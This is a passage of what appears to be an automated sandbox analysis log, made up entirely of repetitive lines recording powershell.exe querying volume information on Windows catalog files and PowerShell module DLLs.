          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
